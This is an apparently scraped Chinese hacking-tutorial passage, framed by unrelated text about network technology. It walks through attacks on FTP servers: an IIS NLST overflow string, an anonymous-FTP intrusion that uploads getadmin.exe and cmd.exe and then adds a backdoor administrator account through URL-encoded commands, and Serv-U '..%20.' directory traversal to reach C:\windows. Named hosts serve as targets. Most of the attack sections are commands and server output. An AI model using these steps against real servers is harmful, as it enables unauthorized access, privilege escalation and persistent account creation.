網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 6.10 基于FTP入侵攻擊 6.10 基于FTP入侵攻擊現在很多的站點用FTP服務來更新網站,但是微軟的FTP服務還是使用第三方軟件如:serv-u、wuftp,但它們都存在著嚴重的漏洞。接下來將介紹一些有關FTP服務存在的漏洞及入侵測試。 6.10.1 IIS FTP遠程溢出漏洞在IIS FTP服務器中NLST命令存在一個緩沖區溢出漏洞,這個漏洞可能使攻擊者在服務器上非法運行一條命令,如果溢出地址不正確的話,也可能會造成服務器關閉。 受影響的系統: Windows NT 4.0 (SP4) IIS 3.0 / 4.0 Windows 95/98 PWS 1.0 攻擊測試 : (1) 找到一臺Windows NT4.0服務器,并提供FTP匿名登錄服務,這里以www.ffhh.net為測試對象。接下來打開MS-DOS程序(Windows 2000操作系統打開命令提示符),在命令提示符下,攻擊侵者向目標機輸入以下格式: ftp www.ffhh.net 如圖6-96所示。 圖6-96 以FTP方式登錄到www.ffhh.net主機 提示: Microsoft FTP service (Version 4.0)這里是指測試服務器所使用的FTP版本為:微軟公司的4.0版本,從230 Anonymous user logged in可以看出,登錄的方式為匿名登錄,匿名用戶只有對服務器上的數據讀的權限,所輸入的用戶名是ftp,在要求輸入密碼時,可以為空,也可以填寫一個E-mail地址即可。 注意: 一般情況下匿名登錄用戶名為 Anonymous ,在輸入用戶名時輸入Anonymous,密碼為空或是輸入一個E-mail地址后直接按Enter鍵即可。 (2) 在FTP命令下輸入以下內容: ls BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 如圖6-97所示。 圖6-97 攻擊測試 提示: 服務器顯示150 Opening ASCII mode data connection for file list,說明該服務器關閉。 (3) 此時被測試的服務器關閉,服務器端反映如下: The instruction at '0x710f8aa2' referenced memory at '0x41414156' EAX = 0000005C EBX = 00000001 通過多次的調試和測試,可以得出服務器端準確的溢出地址,從而能在服務器上執行一條非法命令。 6.10.2 匿名FTP入侵如果IIS服務器允許匿名賬號FTP登錄的設定,會給入侵者帶來了突破Windows NT Server的機會,接下來看看入侵者是如何入侵允許匿名賬號FTP登錄的服務器。 入侵測試: 操作系統:Windows 98 目標服務器地址:www.54hack.com 所用程序:getadmin.exe(在Windows NT下提升用戶權限) (1) 選擇【開始】→【程序】→【MS-DOS方式】命令打開命令提示符,在提示符下鍵入: c:\> ftp www.54hack.com Connected to www.54hack.com 220 54hack Microsoft FTP Service (Version 3.0). 提示: 54hack就是NETBIOS名,那么一定會有一個IUSR_54hack的用戶賬號,入侵者可以通過這個賬號來獲取Administrator的權限。 User (www.54hack.com:(none)):anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 輸入guest@ 或者guest 對于缺乏網絡安全知識的管理員來說,很多人沒有將guest賬號禁用,或者沒有設置密碼,那么guest賬號就是一個可用的正確的用戶賬號,雖然只屬于Domain guest組,在這種情況下我們就可以進NT Server的FTP了。 (2) 進去以后,如果輸入cd /scripts后改變目錄成功,這時入侵就有了80%的把握了。 (3) 把WinNT下的cmd.exe復制到scripts文件夾下,把getadmin.exe和gasys.dll上傳到scripts目錄下,然后輸入: http://www.54hack.com/scripts/getadmin.exe?IUSR_54hack 大約十多秒后屏幕顯示: CGI Error 這時已經把IUSR_54hack升級為Administrator,也就是任何訪問該Web站的人都是 管理員。 (4) 添加用戶,在瀏覽器中輸入如下內容: http://www.54hack.com/scripts/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20system32%20ffhh%20/add 這樣就創建了一個叫system32的用戶,密碼是:ffhh,然后提升權限輸入如下內容: http://www.54hack.com/scripts/getadmin.exe?system32 (5) 入侵測試完成,完全控制目標計算機。 6.10.3 Serv-U入侵Serv-U是一款很出色的FTP服務器軟件,在網上的應用很廣泛,其設置簡單,小巧玲瓏,很受用戶喜愛。 但是在2000年12月3日Zoa_Chien (zoachien securax.org)發現了Serv-U的一個重大漏洞,這個漏洞使安裝有Serv-U軟件的服務器的硬盤暴露在網絡上。這個漏洞在2.5i以前版本中全部存在,但是現在還有很多的網站仍然在使用2.5i以前的版本。下面就來看看入侵者是如何利用該漏洞的。 (1) 入侵者使用匿名進入一個使用Seru-U的2.5i以前版本FTP站點: ftp>pwd 257 "/c:/ftproot" is current directory. ftp>cd .. 550 /c:/: Permission denied. 解釋: 權限不足。 ftp> ls .. 200 PORT Command successful. 550 Permission denied. 解釋: 沒有權限查看上一級目錄。 (2) 換種方式,輸入如下命令格式: ftp> ls ..%20./* 注意: 命令格式中必須加上/*。 上一級目錄(C:\)中的東西盡收眼底了! ftp> cd ..%20. ftp> pwd 257 "/c:/ftproot/.." is current directory. 解釋: 當前目錄變成了c:\ftproot\..,即根目錄。 這是由于..%20在這里相當于..;而且,在Serv-U分析這個目錄的時候,把..當作當前目錄下的子目錄,而不是直接進入上一級目錄。所以C盤根目錄,也就是c:\ftproot\..被當作ftproot里面的子目錄來操作。如果在Serv-U的設置中,c:\ftproot被當作用戶的主目錄,用戶可以對它和其子目錄進行讀和寫的操作,而本來用戶被禁止操作的其他目錄,就可以通過這種方式當作當前目錄的子目錄而繼承其屬性,用戶也可以對它讀寫了。假如當前在\c:\ftproot\incoming\目錄,那么就可以用..%20./..%20./windows來表示\c:\ftproot\test\..\..\windows,即c:\windows目錄,如果incoming目錄對用戶完全開放,可以進行讀、寫、刪除、列表、建目錄,那么用戶也就可以對c:\windows目錄進行一些可怕的操作了。 經過證明%20..%20%20..、..%20%20..、%20..%20.都等效于..。如果管理員不重視此漏洞的話,服務器就有可能被入侵都完全控制。 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!